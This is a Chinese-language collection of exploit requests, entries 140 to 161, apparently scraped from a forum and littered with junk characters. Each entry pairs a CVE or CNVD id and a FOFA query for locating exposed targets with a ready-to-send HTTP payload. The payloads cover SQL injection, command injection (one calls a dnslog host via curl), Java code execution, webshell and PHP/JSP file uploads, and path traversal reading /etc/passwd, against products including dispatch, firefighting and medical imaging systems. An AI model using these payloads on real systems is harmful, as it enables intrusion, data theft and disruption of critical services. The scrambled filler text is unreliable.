- U- [: z5 i) sUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0) K5 Y9 l6 l; U* z% u
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
& ~2 c0 K. x. L: S! |, wAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2" p& M' `2 n$ t# m
Accept-Encoding: gzip, deflate, br
7 M- |- ~1 x* |/ J# C: WConnection: close
3 {# y3 Z. T/ c" { j5 f; ^Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk7 O* W: N" ?8 R: W1 J( T9 t
Upgrade-Insecure-Requests: 1
8 i4 B/ f( F& t# W- b ^5 x
- Q: e2 Z: G$ @0 o
1 B D9 @% U, ^% z: c- |, | p140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入. R) J1 e9 X" P! c
CVE-2024-2566
3 i6 [" ^3 b9 ]3 i' XFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
. P$ B6 U( T" x5 B7 n6 w3 l, M3 |GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva×tamp=1&sign=1 HTTP/1.1
: a7 m2 g- Q( t# JHost: x.x.x.x1 v# N2 t9 h2 w& _ Y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
0 {) o/ ` h1 ~2 C0 ?: s. b' CAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8( W( m: W2 }2 S( x) I& j0 T) @
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
2 J: E, C x! r0 Y9 n7 ~$ r8 DAccept-Encoding: gzip, deflate, br
d1 p" ]6 h. ^Connection: close n# \+ Y) y. ?8 k' }8 V2 a
Cookie: authcode=h8g99 G5 r5 N! ~, q
Upgrade-Insecure-Requests: 11 w+ V$ [. `' g* [# a6 Z3 T1 b& z
8 Z0 g8 g% S: K4 b5 m
3 x0 m& p5 o# U& }' v- u; i
141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入7 q% b: w' Y ]% z- V2 o
FOFA:body="指挥调度管理平台"
, s' d9 c. `* o9 }POST /app/ext/ajax_users.php HTTP/1.1
& Z- \( {% m; O4 u7 WHost: your-ip
3 R' ]3 t' Q) \: ~: `2 l% FUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info: j G" d0 J2 ~* R$ @
Content-Type: application/x-www-form-urlencoded/ q( ~8 a* l. ~3 [
3 }' }' m1 f- a: F
* `1 p+ {, [6 D- }. G3 I1 X8 |
dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -0 A- ?) D$ @( e! y ]* y8 q
! H* ?' M6 W% f# ?3 g. G
; N* o* a5 m3 @3 L" @9 Q4 `' M142. CMSV6车辆监控平台系统中存在弱密码
9 @% Z: l% U1 `2 H4 E) Q: }CVE-2024-29666% }& Z% l% X; N, h$ S
FOFA:body="/808gps/": G4 a9 p+ j! j, W3 r5 M; y
admin/admin- S' i9 E: O5 t* W) B' C# \
143. Netis WF2780 v2.1.40144 远程命令执行& z" b: U5 F6 k, ?6 a
CVE-2024-258501 N& N4 o2 J5 T# u+ Q
FOFA:title='AP setup' && header='netis'; G3 X6 N* O1 |0 k H" x
PAYLOAD2 o& f$ |/ F Y
8 H2 D6 c+ V+ [
144. D-Link nas_sharing.cgi 命令注入
& [$ D1 E; D( C0 @! v5 ]9 [1 E8 j. bFOFA:app="D_Link-DNS-ShareCenter"
3 S* _+ a3 g2 Z/ K3 H Q- S' ksystem参数用于传要执行的命令
' J; P' n5 F, v+ L7 c- v9 m5 xGET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1' K6 v- m) @8 N7 F$ A0 q: h
Host: x.x.x.x! f5 ?6 O5 q: q6 a" h
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0. r0 B6 F9 y) O" F! V9 T3 x, ~
Connection: close
. q% {$ l$ t1 }Accept: */*
. s$ G8 \1 ?1 Z7 CAccept-Language: en
0 _) g0 |1 z( y: GAccept-Encoding: gzip
/ f% a5 k- @( \4 V, S+ O
/ t& d2 b. t" }4 J; h: n1 f2 s) R! v
) W: o9 `1 s" Q2 r- T; T! f. r; }145. Palo Alto Networks PAN-OS GlobalProtect 命令注入
/ h% w2 b0 q, hCVE-2024-3400
- u: Q, A' `1 C$ Z* HFOFA:icon_hash="-631559155"
* E. U4 g" N$ _6 V" bGET /global-protect/login.esp HTTP/1.10 j8 e. [% f" b, _
Host: 192.168.30.112:1005, l0 g! |. |! E( L4 s
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84! M" r% S+ J% \ ^, B: u: D
Connection: close
" }, R# A& H, _& j; z( n& }7 d9 ^Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;8 g" ^3 g5 ~3 v) n3 {6 s( `
Accept-Encoding: gzip
5 p5 g B; T9 A; o+ H. I# L b! \* v; m. T: s
8 B3 O' ] Q( r1 F3 S# V- Q% v4 s
146. MajorDoMo thumb.php 未授权远程代码执行9 k4 B0 h, _: Z* n, H8 I- B
CNVD-2024-02175
/ o( f! C; Y. a6 Z) m/ n; dFOFA:app="MajordomoSL"
: v' J2 {8 j$ o/ I. E$ q8 kGET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
8 C' R- x5 l4 G7 g8 l. p, rHost: x.x.x.x7 V1 [- X/ n. X1 B) S+ v _) q+ R
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.841 E. H7 M% h2 Q$ o- K' r& P
Accept-Charset: utf-83 f$ m( v% T. P- n) R$ w, |( Y6 d
Accept-Encoding: gzip, deflate
p T/ v0 Q9 Y. z4 iConnection: close
5 g7 Z9 I6 J& y' h9 |8 ?: E; x$ }, ~9 N& T0 o* L5 m
! Y9 |& J _- Y! f9 V
147. RaidenMAILD邮件服务器v.4.9.4-路径遍历' k& h" F( E3 Y7 t, A' r6 f, G( H- X, Y
CVE-2024-323990 `% W& ]7 z' w! }& Q& F! g
FOFA:body="RaidenMAILD"$ L! j5 l( v$ d2 M
GET /webeditor/../../../windows/win.ini HTTP/1.13 Q5 g- Y1 {; r9 e' p8 X" T, L2 @9 j
Host: 127.0.0.1:81
( e3 A0 ?9 c2 c& D; g3 H; oCache-Control: max-age=01 \) {0 K, ~$ M- `* A* W
Connection: close
! U6 J9 |) D* |! t% }& P5 F* s: \1 g
& o3 Y! v' U) O6 _148. CrushFTP 认证绕过模板注入
7 \9 C/ h6 h; K; m$ O& jCVE-2024-40407 g; f4 A- p+ S4 a! n
FOFA:body="CrushFTP"
' a4 {# ?& _& q+ \8 ~0 h, ePAYLOAD7 |1 W7 h& i) y3 l
3 e+ Z% |* s) I7 d& d6 p* l7 ?
149. AJ-Report开源数据大屏存在远程命令执行
2 o/ \& m" s5 x- o" LFOFA:title="AJ-Report"
7 w7 p3 _* k) ^8 w$ Y* Y3 w
$ F6 _9 `' s* [- G* ~4 I* k) _POST /dataSetParam/verification;swagger-ui/ HTTP/1.14 t% M# _% n8 p: r8 \% d, A u
Host: x.x.x.x
, q8 C+ n+ c# r& T: w' {; E9 s5 oUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
" y( l5 Y$ D8 E/ ]$ _8 H" CAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7$ Q) `' |9 A( m" Z$ \8 Z: V
Accept-Encoding: gzip, deflate, br& l% T* l, p! y
Accept-Language: zh-CN,zh;q=0.9
$ d D$ j {2 PContent-Type: application/json;charset=UTF-8
& e8 P, u7 f) H( |. G, |Connection: close1 u" U" [4 y& p0 b7 L; L1 p
$ O1 H( J8 B \8 ~- W3 } s{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}
3 v# f ?' u2 F j. v' `- ~) d4 x% r7 |5 m
150. AJ-Report 1.4.0 认证绕过与远程代码执行9 l% S/ b% C0 u
FOFA:title="AJ-Report"& m! S" V' ?. g A, [8 L
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
% m/ `; _% T" v' M8 Y/ CHost: x.x.x.x& J' ?1 H+ t" M' c7 I
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
* a; |# F9 y, n: X' [Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
( x! e" v1 _, K8 i8 Y5 G5 U- [Accept-Encoding: gzip, deflate, br: q, z4 I4 N/ o: d+ h1 }
Accept-Language: zh-CN,zh;q=0.9
5 h* k, t2 t0 Z) S6 }0 ^Content-Type: application/json;charset=UTF-8; @2 i" E1 W- l( e4 A1 _
Connection: close( b7 f) C/ K+ y" S- ^1 M
Content-Length: 339( B$ r, Y- R L; _
9 |/ @: P ~! ~7 ]6 o
{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}$ q& x$ p/ b1 a- G4 F
! o% e' I! U7 L$ J$ n3 Q: C e% ~8 N9 V
151. AJ-Report 1.4.1 pageList sql注入* C( Z4 Q1 J0 d. V2 ?/ e8 W
FOFA:title="AJ-Report"
2 o0 _9 M I! ~- S2 PGET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
9 `+ K+ i0 K2 T$ ]. Z6 KHost: x.x.x.x6 B$ p6 K: Q0 G4 F' B; X7 J
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15- F! v- W5 @; d; R/ ]( A
Connection: close q+ T9 `# }7 p$ }2 i
Accept-Encoding: gzip# G% Y( z7 P! ^4 @' k
' i* g; J3 a7 r% T# w5 F) b1 L
/ q. y1 C6 Z; y1 A$ f. j1 a9 ^
152. Progress Kemp LoadMaster 远程命令执行/ t, U" h2 q/ x* z2 M
CVE-2024-1212$ ^; R d4 D$ D6 w p) J! I
LoadMaster <= 7.2.59.2 (GA)
: ]/ `, T! n# v+ x) L* [LoadMaster<=7.2.54.8 (LTSF)
1 s' K( {9 y) m: ^LoadMaster <= 7.2.48.10 (LTS)3 v7 \) H/ W/ u! R
FOFA:body="LoadMaster", A5 Q* Z7 G0 d: o/ y0 K$ I
JztsczsnOmRvZXNub3RtYXR0ZXI=是';ls;':doesnotmatter的base64编码# N/ l4 z! H1 W4 D! v9 S9 ]% C
GET /access/set?param=enableapi&value=1 HTTP/1.1
6 h( v# q$ z% E _/ B+ n7 tHost: x.x.x.x
1 D0 Z7 p! m5 o( LUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
- v- |$ D0 G6 Z3 m3 N& dConnection: close
! D2 {! d4 e8 T9 [$ Z( hAccept: */*
4 j3 h* @: R r+ E( JAccept-Language: en, `" H% q% }6 ]: p2 a6 G
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=; H" N( s: a, V4 |2 X
Accept-Encoding: gzip5 ~' @" f% l& X/ s! [9 ^5 h8 e
- p/ n6 y! o1 D4 y0 x1 G$ i6 e
- c8 ^0 a/ }& i" u153. gradio任意文件读取2 r# P' N+ s5 V+ ]1 t9 ]4 P
CVE-2024-1561FOFA:body="__gradio_mode__"
7 J8 l0 |: D n, n% {第一步,请求/config文件获取componets的id
$ P# i) u; n& `$ N3 Q5 w" p9 `7 }http://x.x.x.x/config
# y$ K U% b5 i# L- Y b8 @" h4 k. b, e5 f! O2 }
) q1 O4 m: `( r9 } S第二步,将/etc/passwd的内容写入到一个临时文件( C+ o0 D) f' y2 l, S! f8 Q7 C
POST /component_server HTTP/1.1
3 q3 }5 t- c' yHost: x.x.x.x* {# h; u4 i8 k6 B, F, T9 h
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3
' K7 Y# j1 D0 y7 K. OConnection: close
/ a$ L0 f# A8 l& D9 H$ R, a5 aContent-Length: 115" ]$ @- J. D6 G1 K" u6 q# N2 t
Content-Type: application/json
2 W' d9 h3 p5 YAccept-Encoding: gzip
, ]+ S! L) J6 [, @2 _2 I# g' l; X- h: y- b; o* s
{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}
& R- A, {& ?" n/ u9 g8 u Z' ^3 w5 ]" ?# C: z' A
, f2 E# f" I1 ^" q& X第三步访问
3 F) A7 ~" s1 z7 |7 _5 l" ]http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd
8 Z7 g0 u" a! F8 b
( Z+ L, H( W/ ^! M# C& k. J$ p p% {
154. 天维尔消防救援作战调度平台 SQL注入; R% b. E" u. p
CVE-2024-3720FOFA:body="天维尔信息科技股份有限公司" && title=="登入"
, ~' O" F8 @; aPOST /twms-service-mfs/mfsNotice/page HTTP/1.1" {+ \$ J$ n) s9 A& r
Host: x.x.x.x
" ~5 b( z: q0 @' }Content-Length: 106
% J# q4 }( N6 P% F" ACache-Control: max-age=06 x0 m7 p7 `: m9 Z) @
Upgrade-Insecure-Requests: 15 j2 S6 J5 N5 N j9 ^: Y
Origin: http://x.x.x.x7 A: s# s6 @' K& S$ M4 D, k5 Q
Content-Type: application/json. j% t/ X8 q3 o4 o
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
; e8 W" }! z& K6 \7 W: BAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
" V t( \* r# o) Y9 B0 K5 hReferer: http://x.x.x.x/twms-service-mfs/mfsNotice/page5 [" c3 R+ }% T& l; H( U
Accept-Encoding: gzip, deflate
# B; Y3 ?$ w) l; }; i; [7 n2 NAccept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7# n9 @' M% n% |% A9 t4 ]
Connection: close R- O* |: z$ ]6 d+ T( K
0 b" j1 v, B- {. h
{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}( O t3 u8 k' d" z
" n. N6 b' y- ?. }5 l/ e( `0 Y8 z* A- x/ |
155. 六零导航页 file.php 任意文件上传
! J2 n8 \7 C; iCVE-2024-349826 l1 B/ V) F) j5 z
FOFA:title=="上网导航 - LyLme Spage"- e! S; X# Y x- k' F# x, F/ m
POST /include/file.php HTTP/1.1
" s% g; x3 i! J- o( bHost: x.x.x.x
! F$ u) {3 K. q+ m2 n' N% i* A# M+ @User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0. j! `3 r$ v: W# F1 J/ m, I- Z. p
Connection: close
. f8 D# i7 D, R! aContent-Length: 232
* B7 B% C# {& [; G4 i: b: gAccept: application/json, text/javascript, */*; q=0.01
I, Y- y* f4 o" o( OAccept-Encoding: gzip, deflate, br7 X% Z3 Z, E! c6 {
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.27 ~0 X/ s3 s: w" H$ l# f+ j& I
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f0 K z$ H. _8 N8 v g1 p l0 K
X-Requested-With: XMLHttpRequest
- w$ P+ _6 j+ E7 Z
U) S1 C% j+ m4 x-----------------------------qttl7vemrsold314zg0f& e5 t b( v! _; V/ Z* m
Content-Disposition: form-data; name="file"; filename="test.php"
5 g8 A$ |" @4 v, RContent-Type: image/png2 j8 w# g' w! Y/ l% V' w
) i( N& }4 y$ f7 G
<?php phpinfo();unlink(__FILE__);?>
. ?) o) N! g4 K6 R; {9 z, \# J-----------------------------qttl7vemrsold314zg0f--
5 y, [- [% o# x( f1 k9 l" P/ L( U" s1 w I# d) D) o; W
8 w9 B$ R$ B% F5 Y( A; h访问回显文件http://x.x.x.x/files/upload/img_664ab7fd14d2c.php
& f8 J a# V+ Q+ H# _: H+ _ [* ~$ u. }: P: _- K
156. TBK DVR-4104/DVR-4216 操作系统命令注入
) o I M3 e1 O( t* b) nCVE-2024-3721
9 l/ |; h9 X6 g8 S: e7 Q4 _5 IFOFA:"Location: /login.rsp"! }% A1 A/ `& ?( J
·TBK DVR-4104
7 D; }$ O8 r" N# r, Y% w) V·TBK DVR-4216
8 N+ Y5 G& I3 ^+ m. Ecurl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1", S$ r/ k* S1 k# X K- Q7 W
% ^6 d6 L7 w1 a6 }& k
, }% n' `2 |- n* {- Z: _POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1- ~; r3 k" S6 B. C' G& p
Host: x.x.x.x0 D c8 T8 w4 h& H4 V
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
2 M) K1 S$ L9 ~6 b# R# B" {( I* lConnection: close! T0 e. W/ p* b1 k2 j# o7 Y& P
Content-Length: 0
3 V" A4 o4 s* r/ s% l( M' yCookie: uid=1" Y9 M, x, x% O* K
Accept-Encoding: gzip8 n/ z( N4 A& g' Q( h3 M
" L: V/ b9 M+ r
/ T: i/ P: [! v. f157. 美特CRM upload.jsp 任意文件上传, j: i" K/ G9 a7 ]% C8 p2 ~4 A: C0 m& y
CNVD-2023-06971 a5 c1 o% g2 ?9 D2 z2 `
FOFA:body="/common/scripts/basic.js"& ~$ a4 \( X, {
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
, v6 S4 z; i' Z0 p% j& iHost: x.x.x.x4 \, p6 p- N; l4 Z( h
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
" @5 H1 \7 O' b; ]4 i1 sContent-Length: 709# w a2 R- m8 }, c, M0 h' G( T
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.73 p: _. k% x( R* X- ?- i
Accept-Encoding: gzip, deflate
% X0 O; R' e+ C+ q% S: ?, cAccept-Language: zh-CN,zh;q=0.9: v# z9 c- C3 O: |; o4 ]9 z
Cache-Control: max-age=06 X6 o- P9 f" R
Connection: close
+ {; G* H; r" i; [# x" WContent-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
) f2 J5 {7 [5 @0 G* FUpgrade-Insecure-Requests: 1, y% O8 y+ }0 Z& I0 I: ~; F
5 t8 H. A2 A v
------WebKitFormBoundary1imovELzPsfzp5dN
% k: J& t3 j% v' ~. DContent-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"' D8 r8 \/ t: S3 N
Content-Type: application/octet-stream+ T, k( c$ I I0 u
% p+ U l4 T. Q6 W: u4 e
nyhelxrutzwhrsvsrafb
" N$ V) U2 e. D/ x/ N9 ]9 h2 P------WebKitFormBoundary1imovELzPsfzp5dN! J1 P4 c1 W4 d
Content-Disposition: form-data; name="key"
- ^) b. y2 N+ J6 m) s& m) m
0 G* N, t& Z# ]) q% K+ p; z5 ^. [( Pnull" \' j: _, m& f2 @0 ~
------WebKitFormBoundary1imovELzPsfzp5dN* ~; e I4 G$ N) @
Content-Disposition: form-data; name="form"
: x! B2 E4 w) f9 C4 L7 b1 U. X3 j7 q% ~" r; D. d2 U3 O! [
null
, l" ?1 c. Y4 S2 j, m% p------WebKitFormBoundary1imovELzPsfzp5dN
( c& o+ s* M+ {$ D. p2 p. Q1 OContent-Disposition: form-data; name="field"& p" ]. w! v( G! C- h
1 a ~4 m0 b! p7 N% [( w
null6 Z7 O& U8 u% L' \. {3 u
------WebKitFormBoundary1imovELzPsfzp5dN
1 \1 \2 M3 I9 W# {9 R8 \$ LContent-Disposition: form-data; name="filetitile"( }% M& o4 C+ S4 N/ S+ }1 y- o
4 a& a! [* p; A0 G7 Jnull! J% O0 X. }3 D% j. z" I. \$ e8 A/ L
------WebKitFormBoundary1imovELzPsfzp5dN
9 s. ?6 b/ F z: _/ G/ c. B7 |Content-Disposition: form-data; name="filefolder"
6 b, Z m$ M! X5 R& [6 p2 ^7 L) [( P* J6 l3 }' L) A
null4 t Y" n* x- l- Y# F: }+ j
------WebKitFormBoundary1imovELzPsfzp5dN--
9 G' g4 _# H4 L+ D$ E$ z
3 f, Z$ g1 J0 K9 Q7 i9 [# Y' `' R. e8 h
http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp& B$ k7 v3 _$ a5 ]
4 _4 j0 v9 P( u5 M# V
158. Mura-CMS-processAsyncObject存在SQL注入+ i) o' ]- _! b; K6 e
CVE-2024-326405 d' X% I( N: Q3 [. ~5 E3 `. e! V5 w
FOFA:"Generator: Masa CMS"( d4 p3 j/ @" B# \1 G% X
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
+ k! h) r; E. X# \; _Host: {{Hostname}}! R5 g# S$ t, }
Content-Type: application/x-www-form-urlencoded' F }: C6 B$ I# B! x3 [( ~) _
. P4 j2 A9 X9 j7 F" x
object=displayregion&contenthistid=x\'&previewid=1" a/ @# v/ C1 Y; ?& {9 @
6 u* A( Q, C2 J- M, d$ \6 Y3 z( W* B9 }) a- C$ _* V6 [2 `
159. 英飞达医学影像存档与通信系统 WebJobUpload任意文件上传
4 |. D- @0 y6 w7 Q& SFOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
8 ]. ^' b5 w$ L' Z$ LPOST /webservices/WebJobUpload.asmx HTTP/1.1+ V! n$ J" m! E6 o) ~
Host: x.x.x.x- e9 d% u/ h& r
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
" L1 u: k+ j( \8 _$ a$ @; HContent-Length: 1080
4 H& z$ ~& q! ]5 @/ U- J# yAccept-Encoding: gzip, deflate
, a, {0 ?' S2 Y# a. J: b% xConnection: close! H$ A! m: K% y% x) c- `: G! M
Content-Type: text/xml; charset=utf-8
. s5 @6 {1 E$ r# | y! {Soapaction: "http://rainier/jobUpload"
( a A- u9 b4 E. |. w2 v# I
' I& m1 A& ?. ` d<?xml version="1.0" encoding="utf-8"?>
4 D7 H) O3 M* w( b<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">0 l8 K+ F9 Q8 e, d+ b5 s
<soap:Body>! r1 a% ]0 K3 r- m
<jobUpload xmlns="http://rainier">
, x3 q* |+ H3 ~0 c<vcode>1</vcode>/ g3 M2 Q4 b2 g) z- G' e3 }2 G
<subFolder></subFolder>
3 `, p. L, b+ s) J& a0 ^<fileName>abcrce.asmx</fileName># m9 M5 [# A* ^" P/ ^( o. u
<bufValue>PCVAIFdlYlNlcnZpY2UgTGFuZ3VhZ2U9IkpTY3JpcHQiIENsYXNzPSJXZWJTZXJ2aWNlMSIgJT4KIAppbXBvcnQgU3lzdGVtO2ltcG9ydCBTeXN0ZW0uV2ViO2ltcG9ydCBTeXN0ZW0uSU87aW1wb3J0IFN5c3RlbS5XZWIuU2VydmljZXM7CmltcG9ydCBTeXN0ZW0uV2ViLlNjcmlwdC5TZXJ2aWNlczsKaW1wb3J0IFN5c3RlbS5XZWI7CmltcG9ydCBTeXN0ZW0uV2ViLlNlcnZpY2VzOwogCnB1YmxpYyBjbGFzcyBXZWJTZXJ2aWNlMSBlleHRlbmRzIFdlYlNlcnZpY2UKewogCldlYk1ldGhvZEF0dHJpYnV0ZSBTY3JpcHRNZXRob2RBdHRyaWJ1dGUgZnVuY3Rpb24gQ21kc2hlbGwoUGFzcyA6IFN0cmluZykgOiBWb2lkCiAgICB7CiAgICAgICAgICAgIHZhciBjIID0gSHR0cENvbnRleHQuQ3VycmVudDsKICAgICAgICAgICAgdmFyIFJlcXVlc3QgPSBjLlJlcXVlc3Q7CiAgICAgICAgICAgIHZhciBSZXNwb25zZSA9IGMuUmVzcG9uc2U7CiAgICAgICAgICAgIGV2YWwoUGFzcyk7CiAgICCB9Cn0=</bufValue>& R6 J1 I/ ?) m0 I S' I
</jobUpload>& Z9 R' y$ K1 g& T
</soap:Body>
& J% x, ^ D: m9 K</soap:Envelope>: i4 i# \4 U' x+ z! X1 Y
# G9 k6 Y) n' s/ Q4 o/ o/ }: v5 u& n
u# i$ i/ [6 Q% i; o1 r/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")6 @' Z8 x+ j% _0 N2 r
5 i4 \( Z) H% q! T r: u! A
0 a9 a$ h( p3 o7 D
160. Sonatype Nexus Repository 3目录遍历与文件读取& e( R4 z6 s9 j9 h+ X
CVE-2024-4956
( h8 L1 s; x* f* s* T0 @) \, HFOFA:title="Nexus Repository Manager"& q. C; e: V9 u: Z
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
- D; `9 k3 ?# |% N- l0 sHost: x.x.x.x# k5 y5 F/ ^: M) O, w* c
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
, l- p" j" f; S. wConnection: close U: d9 h* c, J/ u
Accept: */*7 K5 o) Q7 J/ q5 \
Accept-Language: en
+ t" f9 Q- {6 K6 h1 C% `Accept-Encoding: gzip
- n: [. n( d5 I, [, X, e4 d1 }3 ~6 A! n! s
' p0 \# x* t0 R* L
161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传
9 a! Y- o- D1 I0 _FOFA:body="/KT_Css/qd_defaul.css"
- c1 u: U2 ]) w1 c* n0 ~第一步,上传文件<fileName>字段指定文件名,<fileFlow>字段指定文件内容,内容需要base64加密
: M8 M5 _. N8 [! P! [: _5 yPOST /Webservice.asmx HTTP/1.1
0 `" u n1 V: ~ R. K3 IHost: x.x.x.x
: L/ f) F4 V- Z# [8 e, aUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36 @9 [; \4 a* t) c
Connection: close
- t. [ d- g/ \; aContent-Length: 4458 }( ]6 t0 R+ ]. k1 n' w, H
Content-Type: text/xml
4 Z, o. w: {! R, hAccept-Encoding: gzip$ Z, i+ L7 b& ^1 U* N
8 D' I# R2 o9 g
<?xml version="1.0" encoding="utf-8"?>8 l& g( R Y3 b& R
<soap:Envelope xmlns:xsi="0 q( P# o l9 {
http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"
* \9 i% F" G* T+ s Bxmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">3 ~" p" _( W. n7 Q' K' H. @
<soap:Body>
+ J# j4 z/ K6 l/ {. \$ [. z Q3 R; }<UploadResume xmlns="http://tempuri.org/">$ E( P& p; }' E0 r7 [
<ip>1</ip># e% n. {0 n4 t6 z
<fileName>../../../../dizxdell.aspx</fileName>
3 p& M c5 I/ F( A5 e5 H<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>4 g" b( A' V7 B/ D2 G" Y- u- r
<tag>3</tag>" Y) q: o9 L; I4 Q
</UploadResume>
